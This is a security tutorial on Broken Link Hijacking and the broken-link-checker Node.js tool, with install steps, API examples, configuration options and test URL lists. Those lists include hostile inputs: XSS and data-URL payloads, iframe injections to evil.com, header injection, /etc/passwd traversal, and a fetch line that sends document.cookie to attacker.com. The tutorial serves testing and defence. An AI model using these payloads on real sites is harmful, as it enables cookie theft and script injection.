Broken Link Hijacking

Broken Link Hijacking (BLH) is an attack where adversaries exploit abandoned or misconfigured links—such as expired domains, unclaimed social media handles, or outdated CDNs. Once an attacker registers or repurposes these links, they can take control of assets, manipulate content, or execute phishing campaigns.

Why is it a Security Risk? When a linked resource such as an expired domain, unclaimed social media handle, or outdated CDN is no longer controlled by its original owner, attackers can register or repurpose it for malicious activities. This allows them to exploit broken links for phishing attacks, malware distribution, session hijacking, and brand impersonation.

The risk grows in environments where outdated dependencies, external assets, or third-party integrations go unchecked. A single hijacked link can silently redirect users, steal credentials, or inject malicious scripts compromising both security and trust.

Exploits of Broken Link Hijacking (BLH)

OAuth Token Interception – Attackers hijack expired OAuth redirect URIs to capture authentication tokens, enabling unauthorized API access and session hijacking.
Dependency Chain Injection – Reclaiming outdated third-party libraries allows adversaries to execute remote code injection (RCE) and supply chain attacks.
Subdomain Takeover via Dangling DNS Records – Exploiting orphaned CNAME or A records to host malicious payloads, execute phishing attacks, or pivot into internal networks.
MX Record Hijacking for Email Spoofing – Taking control of decommissioned email domains to intercept password reset emails and facilitate spear-phishing.
Server-Side Request Forgery (SSRF) via API Endpoint Takeover – Manipulating abandoned API domains to force backend systems into unauthorized internal network access.
Malicious Redirection & SEO Poisoning – Exploiting broken external links to reroute traffic to phishing sites, deploy cryptojacking scripts, or manipulate search engine rankings.

Broken Link Checker (BLC) is a powerful tool for detecting broken links in websites and local HTML files. It helps identify dead links, missing resources, and incorrect redirects to ensure optimal site health.

Installation Prerequisites: Node.js version 14 or higher is required. Installation Command: To install BLC globally, use:

npm install broken-link-checker -g

Usage 1. Command Line Usage Once installed, check available options using:

blc --help

2. Site-wide Broken Link Scan:

blc http://yourwebsite.com -ro

3. Checking a Local HTML File:

blc path/to/index.html -ro

Note: HTTP proxies are not directly supported. If you face network issues, consider using a container with proxy settings.

4. Programmatic API Usage You can integrate BLC into your Node.js project: Installation for API Usage:

npm install broken-link-checker

BLC can then be used in scripts to automate broken link detection. Ensure your website remains error-free by regularly scanning for broken links with BLC

Classes & Methods

BLC provides multiple classes for detecting and analyzing broken links.

SiteChecker: Main class for scanning entire websites.
HtmlChecker: Scans an HTML document to detect broken links.
UrlChecker: Checks a single URL for accessibility issues.

HtmlChecker – Scanning HTML for Broken Links

HtmlChecker scans an HTML document for broken links and emits relevant events. Scanning an HTML Document

const { HtmlChecker } = require('broken-link-checker');
const htmlChecker = new HtmlChecker(options)
.on('error', (error) => console.error("Scan Error:", error))
.on('html', (tree, robots) => console.log("Parsed HTML:", tree))
.on('queue', () => console.log("Queued links detected."))
.on('junk', (result) => console.log("Junk link found:", result.url))
.on('link', (result) => console.log(Checked link: ${result.url} - Status: ${result.broken ? "Broken" : "Valid"}))
.on('complete', () => console.log("Scan completed."));
htmlChecker.scan(html, baseURL);

Methods & Properties

.clearCache() – Removes all cached URL responses.
.isPaused – Returns true if the queue is paused and false otherwise.
.numActiveLinks – Shows the number of links currently being checked.
.numQueuedLinks – Displays the number of links waiting in queue.
.pause() – Temporarily stops processing links.
.resume() – Resumes checking links if previously paused.
.scan(html, baseURL) – Starts scanning an HTML document for broken links.

Events in Broken Link Detection

'complete' – Fires when all links are checked.
'error' – Fires if an error occurs in any event handler.
'html' – Fires when the document is fully parsed.
'junk' – Fires for skipped or unchecked links.
'link' – Fires for every checked link, whether broken or not.
'queue' – Fires when links are added to the queue.

Payloads for Injecting Invalid URLs

https://[invalid].example.com → Tests handling of malformed domains.
http://127.0.0.1:9999 → Checks for misconfigured localhost links.
ftp://ftp.example.com/brokenfile.txt → Tests FTP link validation.
file:///etc/passwd → Verifies handling of local file system links.
https://nonexistent.example.com/404 → Simulates a dead link scenario.

Payloads for Testing Redirections & Loops

http://redirect-me.com -> http://final-destination.com → Detects valid redirects.
http://loop.example.com -> http://loop.example.com → Identifies infinite redirect loops.
https://fake-redirect.com/malware → Tests phishing/malicious redirects.
http://expired-domain.com → Simulates abandoned domain issues.
https://cdn.invalid-resource.com/script.js → Checks outdated CDN references.

Payloads for JavaScript-Based Links

<a href="javascript:alert('XSS')">Click</a> → Detects inline JavaScript.
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Base64</a> → Encodes payloads in data: URLs.
window.location='http://malicious.com' → Simulates forced redirection.
fetch('http://attacker.com/leak?cookie='+document.cookie) → Checks for unauthorized data exfiltration.
<a href="#" onclick="document.write('<iframe src=\'http://evil.com\'>')">Click</a> → Tests for iframe injections

HtmlUrlChecker Scanning

Scans the HTML content at each queued URL to find broken links. All methods from EventEmitter are available.

General Broken Link Payloads

https://example.com/nonexistent-page – Tests 404 responses.
https://example.com/500-error – Simulates a server-side error.
http://example.com:9999/ – Checks response from non-standard ports.
https://expired-ssl.example.com – Tests handling of expired SSL certificates.
https://self-signed.example.com – Simulates a self-signed SSL certificate.
ftp://example.com/missing-file.txt – Checks broken FTP links.
file:///etc/passwd – Tests handling of local file access in URLs.
https://example.com/timeout – Simulates a slow response leading to timeouts.

Redirect Testing Payloads

http://example.com/redirect-loop → http://example.com/redirect-loop – Detects infinite loops.
http://example.com/redirect?target=http://malicious.com – Tests open redirects.
https://www.example.com/moved → https://new.example.com/ – Tests proper handling of permanent redirects (301/302).
https://example.com/temp-redirect → https://another-site.com – Ensures handling of temporary redirects.
https://evil.com/hidden-redirect → https://phishing.com/login – Checks malicious redirect detection.
http://example.com/redirect-without-trailing/ → http://example.com/redirect-with-trailing/ – Tests URL inconsistency.

JavaScript-Based Link Payloads

<a href="javascript:void(0)">Broken JS Link</a> – Checks for non-functional JavaScript links.
<a href="javascript:alert('Test')">Click me</a> – Detects inline JavaScript execution.
<script>window.location.href='http://malicious.com'</script> – Simulates forced redirection via JavaScript.
<img src="javascript:alert('XSS')"> – Tests execution of JavaScript in image tags.
<iframe src="javascript:void(0)"></iframe> – Identifies hidden iframe injections.
<script>document.write('<a href="http://bad.com">Malicious Link</a>')</script> – Ensures dynamic script-injected links are detected.

Obfuscated & Encoded Links

http://%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D/hidden – Tests percent-encoded links.
http://example.com/?q=<script>alert('XSS')</script> – Detects XSS vulnerabilities.
data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGFja2VkIScpPC9zY3JpcHQ+ – Checks for base64-encoded payloads.
//evil.com/malware.js – Tests handling of scheme-relative links.
http://user:pass@evil.com – Tests credential leaks in URLs.
javascript:void(document.location='http://malicious.com') – Simulates JavaScript-based navigation.
<iframe src="https://malicious.com/hidden.html"></iframe> – Checks for hidden iframes.
http://evil.com/%252e%252e/%252e%252e/%252e%252e/etc/passwd – Detects directory traversal attempts.

Broken Image & Media Links

<img src="http://example.com/broken.jpg"> – Tests missing image files.
<audio src="http://example.com/missing.mp3" controls></audio> – Detects broken audio links.
<video src="http://example.com/nonexistent.mp4" controls></video> – Ensures missing video files are identified.
<embed src="http://example.com/missing.swf"> – Checks obsolete Flash content.
<iframe src="http://example.com/missing.html"></iframe> – Detects broken iframe content.

API & Dynamic Link Testing

https://api.example.com/v1/data – Tests valid API endpoint handling.
https://api.example.com/v1/404 – Simulates API returning a 404 error.
https://api.example.com/v1/error – Detects API failures and incorrect responses.
https://cdn.example.com/missing.js – Tests handling of missing JavaScript libraries.
https://example.com/api?token=12345 – Ensures sensitive tokens in URLs are flagged.
https://example.com/search?q=<script>alert('XSS')</script> – Tests search parameter sanitization.
http://example.com/%0D%0ASet-Cookie:%20auth=steal – Checks for HTTP header injection.

SiteChecker

Recursively scans (crawls) the HTML content at each queued URL to find broken links.

const { SiteChecker } = require('broken-link-checker');

const siteChecker = new SiteChecker(options)
  .on('error', (error) => { console.log('Error:', error); })
  .on('robots', (robots, customData) => { console.log('Robots.txt Found:', robots.directives); })
  .on('html', (tree, robots, response, pageURL, customData) => { console.log('HTML Scanned:', pageURL); })
  .on('queue', () => { console.log('Queue Updated'); })
  .on('junk', (result, customData) => { console.log('Junk Link:', result.url.original); })
  .on('link', (result, customData) => { console.log('Checked Link:', result.url.original, 'Status:', result.broken ? 'Broken' : 'Valid'); })
  .on('page', (error, pageURL, customData) => { console.log('Page Scanned:', pageURL, 'Error:', error ? error.message : 'None'); })
  .on('site', (error, siteURL, customData) => { console.log('Site Crawled:', siteURL, 'Error:', error ? error.message : 'None'); })
  .on('end', () => { console.log('Crawl Complete'); });

Large-scale websites

siteChecker.enqueue("https://wikipedia.org", customData);
siteChecker.enqueue("https://github.com", customData);
siteChecker.enqueue("https://amazon.com", customData);

siteChecker.enqueue("https://facebook.com", customData);
siteChecker.enqueue("https://linkedin.com", customData);

Sites with redirects

siteChecker.enqueue("http://example.com/redirect", customData);
siteChecker.enqueue("https://t.co/test", customData);

API endpoints (JSON responses)

siteChecker.enqueue("https://api.example.com/data", customData);
siteChecker.enqueue("https://jsonplaceholder.typicode.com/posts", customData);

URLs with special characters

siteChecker.enqueue("https://example.com/?search=<script>alert(1)</script>", customData);
siteChecker.enqueue("https://example.com/-secure-page", customData);
siteChecker.enqueue("https://example.com/üñîçødë", customData);

Local network testing

siteChecker.enqueue("http://127.0.0.1", customData);
siteChecker.enqueue("http://localhost:8080", customData);

Edge cases (Invalid or malformed URLs)

siteChecker.enqueue("https://invalid-url", customData);
siteChecker.enqueue("https://test[.]com", customData);

#### File URLs (Expected to fail)

siteChecker.enqueue("file://localhost", customData);

Hidden/obscured links

siteChecker.enqueue("https://example.com/#hidden-section", customData);

Mixed content sites (HTTP links on HTTPS sites)

siteChecker.enqueue("https://secure-site.com/http-content", customData);
siteChecker.enqueue("http://insecure-site.com", customData);

URL-checker

Requests each queued URL to determine if they are broken

const { UrlChecker } = require('broken-link-checker');

const urlChecker = new UrlChecker(options)
  .on('error', (error) => { console.log('Error:', error); })
  .on('queue', () => { console.log('Queue Updated'); })
  .on('link', (result, customData) => { console.log('Checked URL:', result.url.original, 'Status:', result.broken ? 'Broken' : 'Valid'); })
  .on('end', () => { console.log('URL Checking Complete'); });

Common Websites

const commonSites = [
  "https://google.com",
  "https://github.com",
  "https://linkedin.com",
  "https://twitter.com/login"
];

Redirects & Shortened Links

const redirectShortLinks = [
  "http://example.com/redirect",
  "https://bit.ly/3kz"
];

API Endpoints

const apiEndpoints = [
  "https://api.github.com/users/octocat",
  "https://jsonplaceholder.typicode.com/todos/1"
];

XSS & Special Character Injection

const xssPayloads = [
  "https://example.com/?search=<script>alert(1)</script>",
  "https://example.com/üñîçødë",
  "https://example.com/-secure-url"
];

Local & Internal Network URLs

const localNetworkUrls = [
  "http://127.0.0.1",
  "http://localhost:3000"
];

Invalid & Malformed URLs

const invalidUrls = [
  "https://invalid-url",
  "https://test[.]com",
  "file://localhost"
];

Hidden Anchors & Mixed Content

const mixedContentUrls = [
  "https://example.com/#hidden-section",
  "https://secure-site.com/http-content",
  "http://insecure-site.com"
];

Nonexistent Domains

const nonexistentDomains = [
  "https://thiswebsitedoesnotexist.tld",
  "http://randomnotarealwebsite123456789.com"
];

Deeply Nested & Parameterized URLs

const deepUrls = [
  "https://example.com/very/deeply/nested/path/to/a/file.html",
  "https://example.com/?id=123&name=test",
  "https://example.com/?param1=<script>alert(1)</script>",
  "https://example.com/",
  "https://example.com/.html"
];

Enqueue URLs for checking

const payloadCategories = [
  commonSites,
  redirectShortLinks,
  apiEndpoints,
  xssPayloads,
  localNetworkUrls,
  invalidUrls,
  mixedContentUrls,
  nonexistentDomains,
  deepUrls
];

payloadCategories.flat().forEach(url => urlChecker.enqueue(url, {}));

Handling Broken/Excluded Links

A broken link will have an isBroken value of true and a reason code defined in brokenReason. A link that was not checked (emitted as 'junk') will have a wasExcluded value of true, a reason code defined in excludedReason and a isBroken value of null.

Checking Broken Links

if (link.get('isBroken')) {
console.log(Broken Link Reason: ${link.get('brokenReason')});
console.log(URL: ${link.get('url.original')});
console.log(HTTP Status Code: ${link.get('http.responseCode')});
console.log(Response Message: ${link.get('http.responseMessage')});
}

Checking Excluded Links

else if (link.get('wasExcluded')) {
console.log(Excluded Link Reason: ${link.get('excludedReason')});
console.log(URL: ${link.get('url.original')});
}

Descriptive Messages for Reason Codes

const {reasons} = require('broken-link-checker');
console.log(Robots Exclusion: ${reasons.BLC_ROBOTS});
console.log(Connection Reset: ${reasons.ERRNO_ECONNRESET});
console.log(Page Not Found: ${reasons.HTTP_404});
console.log(Timeout Error: ${reasons.ERRNO_ETIMEDOUT});
console.log(Too Many Redirects: ${reasons.HTTP_310});
console.log(reasons);

Broken Link Handling

if (link.get('isBroken')) {
console.log(URL: ${link.get('url.original')});
console.log(Broken Reason: ${reasons[link.get('brokenReason')]});
console.log(HTTP Code: ${link.get('http.responseCode')});
console.log(Response Time: ${link.get('http.responseTime')} ms);
console.log(Final Redirected URL: ${link.get('url.resolved')});
}

Advanced Excluded Link Handling

else if (link.get('wasExcluded')) {
console.log(URL: ${link.get('url.original')});
console.log(Excluded Reason: ${reasons[link.get('excludedReason')]});
}

Caching Options

General Settings

cacheMaxAge: 3600000, defines how long a cached response remains valid. cacheResponses: true, enables caching of URL request results. rateLimit: 0, sets the delay before each request. userAgent: "broken-link-checker/0.8.0 Node.js/14.16.0 (OS X; x64)", specifies the HTTP user-agent for requests.

Filtering Options

excludedKeywords: [], excludes links matching specific keywords or patterns. includedKeywords: [], only checks links matching specified keywords. excludeExternalLinks: false, disables checking external links. excludeInternalLinks: false, disables checking internal links. excludeLinksToSamePage: false, prevents checking links to the same page. filterLevel: 1, determines which tags and attributes are considered links.

Robots & Crawling

honorRobotExclusions: true, prevents scanning pages disallowed by robots.txt or meta tags. includeLink: link => true, custom function to include or exclude links. includePage: url => true, custom function to include or exclude pages.

Request & Connection Limits

maxSockets: Infinity, sets the maximum number of simultaneous link checks. maxSocketsPerHost: 2, limits concurrent requests per host to prevent overload. requestMethod: "head", specifies the HTTP request method for checking links. retryHeadCodes: [405], list of HTTP status codes that trigger a retry. retryHeadFail: true, retries failed 'head' requests with a 'get' request.

Error Handling & Debugging

logErrors: true, enables logging of request errors. debugMode: false, allows additional debugging output. timeout: 5000, sets the request timeout duration in milliseconds. retryOnTimeout: true, reattempts requests if they time out.

Advanced Settings

checkRedirects: true, verifies if redirects are functional. followRedirects: true, follows HTTP redirects automatically. ignoreSSL: false, enforces SSL certificate validation. maxRetries: 3, number of retry attempts for failed requests. batchSize: 10, sets the number of URLs processed simultaneously. customHeaders: {}, allows defining custom HTTP headers for requests.